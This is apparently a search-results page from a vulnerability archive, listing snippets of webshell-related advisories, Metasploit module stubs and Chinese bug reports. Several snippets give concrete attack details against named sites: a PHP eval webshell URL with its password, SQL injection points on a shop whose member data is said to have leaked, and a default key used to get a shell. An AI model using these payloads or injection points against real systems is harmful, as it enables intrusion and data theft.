2122 matches found
China Chopper Caidao PHP Backdoor Code Execution
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit4 'China Chopper Caidao PHP Backdoor Code Execution', 'Description' = %q This module takes advantage of the China Chopper Webshell that...
China Chopper Caidao PHP Backdoor Code Execution Exploit
This Metasploit module takes advantage of the China Chopper Webshell that is commonly used by Chinese hackers. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit4 'China Chopper Caidao...
cmseasy官网无条件getshell
简要描述: CMS官网 无条件getshell 想走个大场商 求20rank 详细说明: 首先先看webshell 要不直接把我的webshell给覆盖掉了 菜刀地址 http://www.cmseasy.cn/post/list.php?list=@eval%28$POST%27a%27%29; 密码a 漏洞证明: view-source:http://www.cmseasy.cn/post/list.php?list=echo%20filegetcontents%27list.php%27; http://www.cmseasy.cn/post/list.php?list=phpin...
China Chopper Caidao PHP Backdoor Code Execution
This module takes advantage of the China Chopper Webshell that is commonly used by Chinese hackers. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'China Chopper Caidao PHP Backdoor Code...
Arbitrary File Upload Vulnerability in Wisdom Governance Cloud Platform of Hangzhou Fuli Computer Software Co.
Hangzhou fu li computer software limited company wisdom governance cloud platform is is the wisdom of the street solution. There is an arbitrary file upload vulnerability in the intelligent governance cloud platform of Hangzhou Fuli Computer Software Co. As the background of the intelligent...
SiteServer XSS+background uploading(the chicken help combination still very adorable)-vulnerability warning-the black bar safety net
Siteserver XSS+background randomly generated webshell Test version: SiteServer V3. 4. 3 1, The storage-typeXSS, www.xxx.com/UserCenter/main.aspx website content submission, click published,to edit click on the source-insert a periodXSSS,such as”scriptalert2 2 2 2 2 2 2 2 2 2 2/script,click on...
茅台网上商城存在SQL注射47w会员数据泄漏还有主库泄漏(未查看是啥数据)
简要描述: sa权限,原谅我拿不下webshell 详细说明: 注射点1:http://www.emaotai.cn//ProductUnSales.aspx?keywords=wooyun&tagIds=12 注射点2::http://www.emaotai.cn/wapshop/productList.aspx?keyWord= 主库,500多个表,应该是订单什么的,但是没去看 漏洞证明: 看详细说明...
B374K - PHP Webshell with handy features
This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser. Features : File manager view, edit, rename, delete, upload, download, archiver, etc Search file, file content,...
Mango Automation 2.6.0 File Upload / Code Execution CSRF
Mango Automation 2.6.0 CSRF File Upload And Arbitrary JSP Code Execution Vendor: Infinite Automation Systems Inc. Product web page: http://www.infiniteautomation.com/ Affected version: 2.5.2 and 2.6.0 beta build 327 Summary: Mango Automation is a flexible SCADA, HMI And Automation software...
Photos in Wifi 1.0.1 iOS - Arbitrary File Upload Vulnerability
Exploit for iOS platform in category web applications Document Title: =============== Photos in Wifi v1.0.1 iOS - Arbitrary File Upload Vulnerability Product & Service Introduction: =============================== Share the photos and videos of your iPhone/iPad in wifi. Upload photos and videos...
TRS WCM5.2 任意文件上传漏洞
漏洞影响版本WCM5.2,其他版本未测试TRS WCM的Web Service提供了向服务器写入文件的方式,可以直接写jsp文件获取webshell。通过访问http://xxx.com/wcm/services可以查看TRS WCM的Web...
FineCMS高级版前台getshell(demo成功)
简要描述: demo也shell了哦 详细说明: 看到\member\api\uc.php define'DISCUZROOT', dirnamedirnamedirnameFILE.'/member/ucenter/'; include DISCUZROOT.'api/uc.php'; 就是包含了uc的那个插件。但是这个功能只有高级版才有,免费版没有 然后uckey都是默认的 8808cer8o1UJsEpt2G2Jn0uhEn/YgEva589Mfo0 然后就可以直接getshell了 附上脚本 ! /usr/bin/env python coding=utf-8 import...
Arbitrary File Upload Vulnerability in Hsort Newspaper Management System
Hsort Newspaper Management System is a set of software for newspapers, magazines, digital version of the publication, update software, just contain the article content of the plain text for simple identification, can be quickly generated by this software according to the template of the entire si...
华速网游交易平台SQL注入
SQL注入一:漏洞文件:/help.asp这里id参数过滤不严存在sql注入的,但是conn.asp中包含了:!--include file="conn.asp"-- !--include file="inc/config.asp"-- % if trimrequest"id" "" then set rs=conn.execute"select from help where id ="trimrequest"id"" order by paixu asc" if not rs.eof then title=rs"helptitle" content=rs"helpcontent" e...
Dedecms远程写文件漏洞
来源链接:http://seclists.org/fulldisclosure/2015/Jun/47 http://blog.nsfocus.net/dedecms-write-file-vuln/ 0x00 漏洞概述2015年6月17日seclists网站上公布了Dedecms的一个远程getshell漏洞细节,造成这个漏洞的原因也有些让人玩味。官方已在2015年6月18日发布了修复版本,下载链接:http://www.dedecms.com/products/dedecms/downloads/本篇文章将分析这个漏洞的成因,并给出触发利用方法。0x01...
Pligg CMS 2.0.2 CSRF漏洞
创建一个新文件,然后写入一个web后门,拿到webshell. 我们可以用另外一个方法也是可以用来getshell,先利用第一个漏洞编辑站点目录index.php,接着我们编辑保存下。 然后运保存成功后,查看index.php,然后就生成了test.php文件...
WordPress Hacks Behind Spike in Neutrino EK Traffic
Unsurprisingly, a rash of compromised WordPress websites is behind this week’s surge in Neutrino Exploit Kit traffic, researchers at Zscaler said. In a report published yesterday, Zscaler said it spotted attacks against sites running older versions of the content management system, 4.2 and earlie...
Arbitrary File Upload Vulnerability in WeChat Service Intelligent Platform of Yue Liang Legend Technology Co.
The main business of EVERLIGHT LEGEND TECHNOLOGY CO., LTD. is industry application software, and the main customers are telecommunication operators, electric power and aviation. WeChat Service Intelligent Platform is one of the operating platforms of Yue Liang Legend Technology Co. A generic...
finecms v1.9.5 has a local file inclusion vulnerability
FineCMS is a content management system based on PHP+MySql. A local file inclusion vulnerability exists in finecms v1.9.5. Allows attackers to upload webshell, gain server privileges, and cause information leakage...
Finecms v1.9.3 Arbitrary File Upload Vulnerability
FineCMS is a small and medium-sized content management system based on PHP+MySql+CI framework. An upload vulnerability exists in finecms 1.9.3, which allows attackers to upload a php-type webshell, which in turn controls the entire system...